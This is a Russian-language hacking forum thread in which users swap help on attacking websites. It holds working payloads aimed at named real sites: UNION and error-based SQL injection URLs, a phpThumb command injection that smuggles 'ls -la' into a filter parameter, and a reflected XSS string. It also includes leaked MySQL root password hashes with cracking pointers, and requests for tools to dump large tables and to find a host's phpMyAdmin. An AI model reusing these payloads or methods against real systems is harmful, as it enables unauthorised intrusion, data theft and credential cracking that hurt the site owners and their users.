Ваши вопросы по уязвимостям.

Короче это угар

Конечно, но благодаря ошибки и получасется вывод.


Вот так ты сможешь провдить инъекцию =)

http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version(),SCHEMA_NAME)+from+information_schema.SCHEMATA+LIMIT+1,2+--+

 

http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=http://wwwwwwww/&ws=320&hs=240&f=png

code inj

обьясните в кратце как использовать

 

http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=/home/site.com/public_html/kartinka.jpg&fltr[]=blur|5%20-quality%2075%20-interlace%20line%20%22/home/site.com/public_html/kartinka.jpg%22%20jpeg:%22/home/site.com/public_html/kartinka.jpg%22%20;%20ls%20-la%20;&phpThumbDebug=9

 

это может быть уязвимо?
Microsoft OLE DB Provider for SQL Server error '80040e21'

Invalid character value for cast specification.

/view_lesson_plan.asp, line 21
если по этой ошибке трудно сказать оставлю линк

и ещё одна
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to int.

/scammer.asp, line 32

 

А ошибка то просто валится или ты чё то в параметр пихаешь?

 

в параметр asp?id=674 подставляем '

 

Попробуй логическое выражение.. Ваапще наврено будет скуля но тока этовинда там другой синтаксис если что..

 

так в том то и дело что пробывал логическое)) ничего не меняется
а с виндой как быть?)

 

Ну всмысле там MS SQL. Где то была статья , даже мож и на ачате, про проведение инъекции. Ну гугл точно найдёт

 

http://clustercenter.org/login.php?return=/index/month/&category=1'
просто ошибка?
не крутится скуля такая?
пробывал у меня не вышло

 

Lilo
в выводе ошибки мускула есть пассивная xss

Code:

http://clustercenter.org/login.php?return=/index/month/&category=<script>alert("xss")</script>'

 

_http://clustercenter.org/login.php?return=/index/month/&category=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))+--+

 

спасибо парни=) понял
плюсики кончились только=(

 

Ребята, подскажите чем зашифрованы пароли в базе данных mysql.user если они имеют такой вид:

root
*6E8611756F31DE90B29395C382E276861503CB8B

debian-sys-maint
*0B749C627EED121EBC71FBFEE656100950D0C2E4

 

это MySQL5

 

root
*6E8611756F31DE90B29395C382E276861503CB8B
вот в этой теме расшифровка
расшифровка hash. Part3 (DES, MySQL, SHA-1)

 

каким скриптом\прогой лучше сдампить таблицу через sql-inj? записей около 500k
sipt и toolza на катят

 

Какая база?

 

подскажите адрес phpmyadmin хостинга logol.ru. Буду очень благодарен. Или же расскажите как узнавать адреса phpmyadmin? может скрипт есть какой то?

 

mysql 5.0.68-log